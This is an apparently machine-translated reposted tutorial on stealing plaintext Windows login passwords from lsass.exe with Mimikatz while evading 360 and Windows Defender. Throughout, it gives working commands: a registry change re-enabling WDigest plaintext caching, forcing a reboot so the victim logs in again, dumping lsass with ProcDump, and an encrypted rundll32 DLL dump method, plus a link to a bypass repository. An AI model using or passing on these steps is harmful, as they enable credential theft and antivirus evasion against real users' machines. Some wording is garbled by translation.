Title: Mimikatz's use and killing direction (over 360, Firefox and Windows Definder)

1. Mimikatz adds modification to the registry to bypass LSA protection (EDR and WD are not considered for the time being)

Mimikatz principle: Mimikatz obtains the plaintext login password stored in the lsass.exe process in reverse. (lsass.exe is used for local security and login policies). First of all, the crawling must be administrator rights when using Mimikatz. In win10, win11, win2012 and other versions, the system will enable LSA protection, and the plaintext password field will display null. The first step is to increase authority: privilege:debug. The second step is to crawl: sekurlsa:logonPasswords Turn off LSA protection: administrator permissions modify the registry, and then use scripts or any method to restart the system to make the administrator of the victim log in again. The plaintext password for this login will be saved in the lsass.exe process. Use Mimikatz to crawl again to display the plaintext password. If you restore the registry, you can change 1 to 0 directly. Modify the command: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

2. Procdump dump bypasses 360, Firefox

Bypass idea: Due to the strength of Mimikatz, major EDRs are already moving further and further on the road to protecting Mimikatz. Therefore, if we do not kill for Mimikatz, even if we are too static, we must consider various postures to bypass the hash action, but this undoubtedly takes a lot of time. Therefore, we can consider taking out the plaintext password that has been stored in lsass.exe and obtain the password through local Mimikatz. Implementation: The premise is that LSA protection has been turned off and administrator rights are used, use Microsoft project Procdump for dumping (since it is a Microsoft project, no EDRs will report poison), and obtain the password information stored in the lsass process and save it as niuma.dmp. Procdump project address: https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump Command: ProcDump.exe -accepteula -ma lsass.exe niuma.dmp Save the generated niuma.dmp to the local area and use Mimikatz to obtain the plaintext password locally. At this time, because the information has been pulled into the same directory as Mimikatz in the local environment, ordinary user permissions can directly read the plaintext password in niuma.dmp. Step 1: sekurlsa:minidump niuma.dmp Step 2: sekurlsa:logonPasswords full

3. DLL file encryption storage bypasses 360, Firefox and Windows definer

Principle: Since the Windowdefinder detection logic is that the file layer is the file generated by lsass.exe and will be deleted. Therefore, it is necessary to encrypt the storage through DLL interference in the memory storage to bypass WD.

Implementation: The premise is that LSA protection has been turned off and is administrator privileges. There may be an error during operation. There is no specified module reference. You need to find the dependencies of the DLL file to save it to the same directory. Use the command to generate an encrypted test.log, save the path C:/Windows/Tmep, save the file locally, decrypt the test.log to obtain the initial storage information, and then obtain the plaintext password the same as the second mimikatz. The first step generates the encrypted file: rundll32 DumpHash.dll dllmain The second step local decryption command: mimikatz decryption.exe test.log 1.bin The third step reads the plaintext: sekurlsa:minidump 1.bin sekurlsa:logonPasswords full (same as the second one, no screenshots are taken)

IV. DLL files and decrypted files

Github project address: https://github.com/xjsafe/MimikatzBypass Reposted from the original connection address: https://www.vpss.cc/381.html